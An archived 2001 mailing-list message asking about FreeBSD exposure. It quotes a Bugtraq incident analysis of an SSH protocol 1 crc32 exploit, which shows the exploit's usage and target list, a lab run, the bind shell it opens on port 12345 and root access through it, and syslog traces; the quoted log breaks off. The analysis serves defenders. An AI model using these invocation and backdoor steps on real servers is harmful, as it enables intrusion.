From: Brett Glass
To: security@freebsd.org
Date: Sun, 18 Nov 2001 12:56:07 -0700
Subject: Patching 4.4-RELEASE against SSHv1 exploit
Message-Id: <4.3.2.7.2.20011118124921.041ea050@localhost>

In a recent message to Bugtraq (quoted below), Dave Dittrich notes that an
SSH exploit has been specifically tuned to attack machines running FreeBSD
4.x and certain versions of SSH. The hole apparently dates back to the
liberally licensed versions of SSH, and so is present in both OpenSSH and
SSH, Inc.'s SSH.

Is 4.4-RELEASE vulnerable in the default install if sshd is enabled? If so,
is there a patch?
--Brett Glass

>Date: Thu, 8 Nov 2001 23:32:32 -0800 (PST)
>From: Dave Dittrich
>To: BUGTRAQ@securityfocus.com, Incidents Mailing List
>Subject: Analysis of SSH crc32 compensation attack detector exploit
>
>
>          ==========================================================
>          Analysis of SSH crc32 compensation attack detector exploit
>          ==========================================================
>
>
>Copyright (C) 2001, David A. Dittrich
>Thu Nov  8 23:31:20 PST 2001
>
>Summary of incident
>===================
>
>On October 6, 2001, intruders originating from network blocks
>in the Netherlands used an exploit for the crc32 compensation attack
>detector vulnerability to remotely compromise a Red Hat Linux
>system on the UW network running OpenSSH 2.1.1. This vulnerability is
>described in CERT Vulnerability note VU#945216:
>
>        http://www.kb.cert.org/vuls/id/945216
>
>Once in the system, a series of operating system commands were
>replaced with trojan horses to provide back doors for later entry
>and to conceal the presence of the intruders in the system. A second
>SSH server was run on a high numbered port (39999/tcp). The system
>was then used for broad scanning (outbound from the UW network) to
>identify more systems running OpenSSH 2.1.1, some of which were
>then attacked manually.
>
>Artifacts and logs were recovered from the system and analyzed.
>
>[NOTE: This particular exploit is presumed to be independent of any
>root kits or tool kits, so do not expect these same attributes to be
>present on all systems attacking with an SSH crc32 exploit.]
>
>The exploit is based on the source code for OpenSSH 2.2.0 (which
>is the follow on to version 2.1.1, and patched a vulnerability in the
>crc32 compensation attack detection function). It is actively being
>used against systems running OpenSSH 2.1.1 servers which suffer from
>this vulnerability, and has been successfully used against SSH.com
>version 1.2.31 as well. (Other implementations of SSH protocol 1
>and versions have not been tested to date.)
>
>The analyzed exploit lists the following targets:
>
>        linux/x86 ssh.com 1.2.26-1.2.31 rhl
>        linux/x86 openssh 1.2.3 (maybe others)
>        linux/x86 openssh 2.2.0p1 (maybe others)
>        freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
>
>While this exploit shows multiple targets, the attackers in this case
>were only scanning for 22/tcp, then connecting to those systems that
>respond to get the server version and explicitly looking for only
>"OpenSSH_2.1.1". These were rapid SYN scans, using a tool that
>comes with the t0rn root kit.
>
>Analysis of the compromised system revealed that 47067 addresses had
>been scanned (totalling 25386 unique hosts -- it is not clear why
>there is such a large overlap.) Of the hosts scanned, 1244 vulnerable
>hosts were identified, and the intruders had successfully exploited
>and entered 4 hosts before the system was taken off-line on October 8.
>
>Other reports of 22/tcp scanning have come in since October 8, and it
>is believed that this exploit is circulating among IRC chat channels.
>
>The exploit does not work against systems that use access control
>restrictions (e.g., SSH.com's "AllowHosts" or "DenyHosts" settings)
>or packet level filters (e.g., ipchains, iptables, ipf) which would
>prevent a host from attempting to exchange public keys. The
>vulnerability requires being able to enter cryptographic key exchange
>negotiation with the server to properly manipulate the stack.
>
>
>Background on the vulnerability and exploit
>===========================================
>
>This vulnerability was first announced by CORE-SDI in their advisory
>CORE-20010207, dated February 8, 2001:
>
>        http://www.securityfocus.com/advisories/3088
>
>Other advisories and bug descriptions are:
>
>        http://xforce.iss.net/alerts/advise100.php
>        http://razor.bindview.com/publish/advisories/adv_ssh1crc.html
>        http://www.securityfocus.com/bugid=2347
>
>On October 21, 2001, a thread was started by Jay Dyson on the
>incidents@securityfocus.com email list about scans for SSH servers
>originating from RIPE net blocks:
>
>http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1
>
>Other groups have, or are working on, studies of scanning for
>22/tcp around the globe.
>
>A discussion on the vuln-dev@securityfocus.com email list prompted the
>following Newsbytes story about selling such an exploit for $1000:
>
>        Hackers Put A Price Tag On New Attack Tool
>        http://www.newsbytes.com/news/01/171291.html
>
>
>[NOTE: The vulnerability is in the source code for SSH protocol 1,
>not for SSH on a particular hardware architecture. Unconfirmed rumors
>exist that indicate shell code for Solaris 8/SPARC SSH.com 1.2.26-31
>may also exist, so ALL ARCHITECTURES should be considered potentially
>vulnerable, not just Linux/i386.]
>
>
>Vendor advisories, statements, and patch information
>====================================================
>
>        http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
>        http://openssh.org/security.html
>        http://www.cisco.com/warp/public/707/SSH-multiple-pub.html
>
>
>Runtime analysis of the exploit
>===============================
>
>The exploit was tested on an isolated network segment, using a network
>address of 10.10.10.0/24, with attacking host using 10.10.10.10 and
>victim host using 10.10.10.3.
>
>The victim is running SSH.com's version 1.2.31 compiled on Red Hat
>Linux 6.0 (Kernel 2.2.16-3 on an i586).
>
>The attacking host was running Fred Cohen's PLAC[1] (CD-ROM bootable
>Linux 2.4.5 system, employing a ram disk for the root partition.)
>Files were copied onto the system using "nc" (Netcat)[2].
>
>This configuration allows some safety in the event the exploit (which
>was reviewed in a cursory fashion by "reqt" disassembly[3]) actually
>has some malicious code. The non-routable network address and
>isolated subnet also prevent potential damage.
>
>
>Attacker's view
>===============
>
>When run with no arguments, the exploit presents the user with usage
>information:
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>root@plac /bin >> ./ssh
>
>
>linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
>openssh 2.2.0 src
>
>greets: mray, random, big t, sh1fty, scut, dvorak
>ps. this sploit already owned cia.gov :/
>
>**please pick a type**
>
>Usage: ./ssh host [options]
>Options:
>        -p port
>        -b base   Base address to start bruteforcing distance, by default 0x1800,
>                  goes as high as 0x10000
>        -t type
>        -d        debug mode
>        -o        Add this to delta_min
>
>types:
>
>0: linux/x86 ssh.com 1.2.26-1.2.31 rhl
>1: linux/x86 openssh 1.2.3 (maybe others)
>2: linux/x86 openssh 2.2.0p1 (maybe others)
>3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>[NOTE: Other versions of this exploit that are circulating have other
>options listed which affect the same hosts, but support a different
>back door port, in one case 3879/tcp, and require a special
>environment variable be set to protect execution (See the README file
>in Appendix B.) This may be a defensive mechanism against the exploit
>being stolen or discovered.]
>
>Our victim system is running SSH.com version 1.2.31 (unpatched)
>on port 2222, with syslog logging directed to a separate file
>("sshdx.log", excerpts shown below).
>
>We select type 0 and attack our server on port 2222:
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0
>
>
>linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
>openssh 2.2.0 src
>
>greets: mray, random, big t, sh1fty, scut, dvorak
>ps. this sploit already owned cia.gov :/
>
>...........................
>bruteforced distance: 0x3200
>bruteforcing distance from h->partial packet buffer on stack
>..............^[[A................|////////\\\\!
>bruteforced h->ident buff distance: 5bfbed88
>
>trying retloc_delta: 35
>....!
>found high words of possible return address: 808
>trying to exploit
>....
>trying retloc_delta: 37
>.!
>found high words of possible return address: 805
>trying to exploit
>....
>trying retloc_delta: 39
>......
>trying retloc_delta: 3b
>......
>trying retloc_delta: 3d
>!
>found high words of possible return address: 804
>trying to exploit
>....
>trying retloc_delta: 3f
>......
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>At this point, the exploit tool appears to "hang". Switching to the
>victim system, things have changed.
>
>
>
>Victim's view
>=============
>
>Prior to the exploit, the victim system shows the standard SSH daemon
>on port 22/tcp, and our vulnerable daemon on port 2222/tcp. Both are
>listening, and the standard SSH daemon has one incoming connection
>(10.10.10.2:33354):
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>[root@victim /root]# netstat -an --inet
>Active Internet connections (servers and established)
>Proto Recv-Q Send-Q Local Address           Foreign Address         State
>tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
>tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
>tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
>raw        0      0 0.0.0.0:1               0.0.0.0:*               7
>raw        0      0 0.0.0.0:6               0.0.0.0:*               7
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>After the above exploit had run to the point of the apparent "hang",
>a new listening service port is now visible on 12345/tcp:
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>[root@victim /root]# netstat -an --inet
>Active Internet connections (servers and established)
>Proto Recv-Q Send-Q Local Address           Foreign Address         State
>tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
>tcp        0      0 10.10.10.3:2222         10.10.10.10:32965       ESTABLISHED
>tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
>tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
>tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
>raw        0      0 0.0.0.0:1               0.0.0.0:*               7
>raw        0      0 0.0.0.0:6               0.0.0.0:*               7
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>During a second "attack", a netstat is run.
>During the attack window, the multiple brute force attack attempts are
>visible:
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>[root@victim /root]# netstat -an --inet
>Active Internet connections (servers and established)
>Proto Recv-Q Send-Q Local Address           Foreign Address         State
>tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
>tcp     1252      0 10.10.10.3:2222         10.10.10.10:33076       ESTABLISHED
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33075       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33074       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33072       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33071       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33069       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33067       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33066       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33064       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33063       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33062       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33061       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33060       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33059       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33058       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33056       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33055       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33053       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33051       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33050       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33048       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33047       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33046       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33042       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33041       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33040       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33039       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33038       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33036       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33035       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33034       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33033       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33032       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33030       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33029       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33028       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33027       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33024       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33023       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33022       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33021       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33020       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33016       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         10.10.10.10:33014       TIME_WAIT
>tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
>tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
>tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
>raw        0      0 0.0.0.0:1               0.0.0.0:*               7
>raw        0      0 0.0.0.0:6               0.0.0.0:*               7
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>LiSt Open Files ("lsof")[4] shows the vulnerable SSH daemon has now
>opened a new listening port:
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>[root@victim /root]# lsof -p 9364
>COMMAND  PID USER   FD   TYPE DEVICE    SIZE   NODE NAME
>sshd    9364 root  cwd    DIR    3,3    1024      2 /
>sshd    9364 root  rtd    DIR    3,3    1024      2 /
>sshd    9364 root  txt    REG    3,3  655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1
>sshd    9364 root  mem    REG    3,3  340771  30722 /lib/ld-2.1.3.so
>sshd    9364 root  mem    REG    3,3  370141  31107 /lib/libnsl-2.1.3.so
>sshd    9364 root  mem    REG    3,3   66231  31103 /lib/libcrypt-2.1.3.so
>sshd    9364 root  mem    REG    3,3   47008  31113 /lib/libutil-2.1.3.so
>sshd    9364 root  mem    REG    3,3 4101836  31102 /lib/libc-2.1.3.so
>sshd    9364 root  mem    REG    3,3  246652  31109 /lib/libnss_files-2.1.3.so
>sshd    9364 root  mem    REG    3,3  252234  31111 /lib/libnss_nisplus-2.1.3.so
>sshd    9364 root  mem    REG    3,3  255963  31110 /lib/libnss_nis-2.1.3.so
>sshd    9364 root  mem    REG    3,3   67580  31108 /lib/libnss_dns-2.1.3.so
>sshd    9364 root  mem    REG    3,3  169720  31112 /lib/libresolv-2.1.3.so
>sshd    9364 root    0u   CHR    1,3           4110 /dev/null
>sshd    9364 root    1u   CHR    1,3           4110 /dev/null
>sshd    9364 root    2u   CHR    1,3           4110 /dev/null
>sshd    9364 root    3u  inet  10202            TCP *:12345 (LISTEN)
>sshd    9364 root    4u  inet  10197            TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>A successful exploit
>====================
>
>Now comes the fun part. The exploit does the typical "bind a shell
>to a high-numbered TCP port" trick, which also is visible in
>"netstat" output (12345/tcp):
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>[root@victim /root]# netstat -an --inet
>Active Internet connections (servers and established)
>Proto Recv-Q Send-Q Local Address           Foreign Address         State
>tcp        0      0 10.10.10.3:12345        10.10.10.10:33077       ESTABLISHED
>tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
>tcp     1252      0 10.10.10.3:2222         10.10.10.10:33076       ESTABLISHED
>tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
>tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
>tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
>raw        0      0 0.0.0.0:1               0.0.0.0:*               7
>raw        0      0 0.0.0.0:6               0.0.0.0:*               7
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>All that is necessary is for the attacker to then use "telnet" or "nc"
>(Netcat) to connect to this port and start executing commands from the
>shell (it is necessary to end each command line with a semi-colon),
>or to pipe commands from a shell script (this automation method is
>common, e.g. as seen in the analysis of trin00 published in 1999
>in connection with DDoS attacks using that tool.)
>
>[NOTE: Feedback from a reviewer of this analysis indicates that if you
>use "nc" to connect to the back door port, rather than "telnet", you
>don't need to terminate commands to the shell with semicolons. Nc
>adds in the newline character that the shell recognizes as a command
>terminator.]
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>root@plac ~ >> telnet 10.10.10.3 12345
>Trying 10.10.10.3...
>Connected to 10.10.10.3.
>Escape character is '^]'.
>id;
>uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
>date;
>Thu Nov  1 18:04:42 PST 2001
>netstat -an --inet;
>Active Internet connections (servers and established)
>Proto Recv-Q Send-Q Local Address           Foreign Address         State
>tcp        0      0 10.10.10.3:12345        10.10.10.10:33077       ESTABLISHED
>tcp        0      0 0.0.0.0:12345           0.0.0.0:*               LISTEN
>tcp     1252      0 10.10.10.3:2222         10.10.10.10:33076       ESTABLISHED
>tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
>tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
>raw        0      0 0.0.0.0:1               0.0.0.0:*               7
>raw        0      0 0.0.0.0:6               0.0.0.0:*               7
>exit;
>Connection closed by foreign host.
>root@plac ~ >>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>Once the attacker exits the shell, things on the victim system go back
>to normal:
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>[root@victim /root]# netstat -an --inet
>Active Internet connections (servers and established)
>Proto Recv-Q Send-Q Local Address           Foreign Address         State
>tcp        0      0 10.10.10.3:2222         0.0.0.0:*               LISTEN
>tcp        0      0 10.10.10.3:22           10.10.10.2:33354        ESTABLISHED
>tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
>raw        0      0 0.0.0.0:1               0.0.0.0:*               7
>raw        0      0 0.0.0.0:6               0.0.0.0:*               7
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>If syslog logging is enabled, the connections and brute force attempts
>are quite visible (remember, this is stock SSH.com 1.2.31 on
>Red Hat Linux 6.0 -- syslog signatures for OpenSSH were not obtained
>in this analysis):
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>Nov  1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298
>Nov  1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299
>Nov  1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300
>Nov  1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301
>Nov  1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302
>Nov  1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303
>Nov  1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304
>Nov  1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305
>Nov  1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.
>Nov  1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306
>Nov  1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.
>Nov  1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307
>Nov  1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308
>Nov  1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309
>Nov  1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310
>Nov  1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311
>Nov  1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312
>Nov  1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313
>Nov  1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314
>Nov  1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.
>Nov  1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315
>Nov  1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316
>Nov  1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317
>Nov  1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318
>Nov  1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319
>Nov  1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320
>Nov  1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321
>Nov  1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322
>Nov  1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323
>Nov  1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324
>Nov  1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325
>Nov  1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326
>Nov  1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327
>Nov  1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328
>Nov  1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329
>Nov  1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330
>Nov  1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331
>Nov  1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332
>Nov  1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333
>Nov  1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334
>Nov  1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335
>Nov  1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336
>Nov  1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337
>Nov  1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338
>Nov  1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339
>Nov  1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340
>Nov  1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341
>Nov  1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342
>Nov  1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343
>Nov  1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.
>Nov  1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344
>Nov  1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345
>Nov  1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346
>Nov  1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347
>Nov  1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348
>Nov  1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349
>Nov  1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350
>Nov  1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351
>Nov  1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352
>Nov  1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353
>Nov  1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354
>Nov  1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355
>Nov  1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356
>Nov  1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357
>Nov  1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358
>Nov  1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359
>Nov  1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360
>Nov  1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361
>Nov  1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362
>Nov  1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363
>Nov  1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364
>Nov  1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365
>Nov  1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366
>Nov  1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367
>Nov  1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368
>Nov  1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369
>Nov  1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370
>Nov  1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371
>Nov  1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372
>Nov  1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373
>Nov  1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374
>Nov  1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375
>Nov  1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376
>Nov  1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377
>Nov  1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378
>Nov  1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379
>Nov  1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380
>Nov  1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381
>Nov  1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382
>Nov  1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383
>Nov  1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384
>Nov  1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385
>Nov  1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386
>Nov  1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387
>Nov  1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected
>Nov  1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388
>Nov  1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389
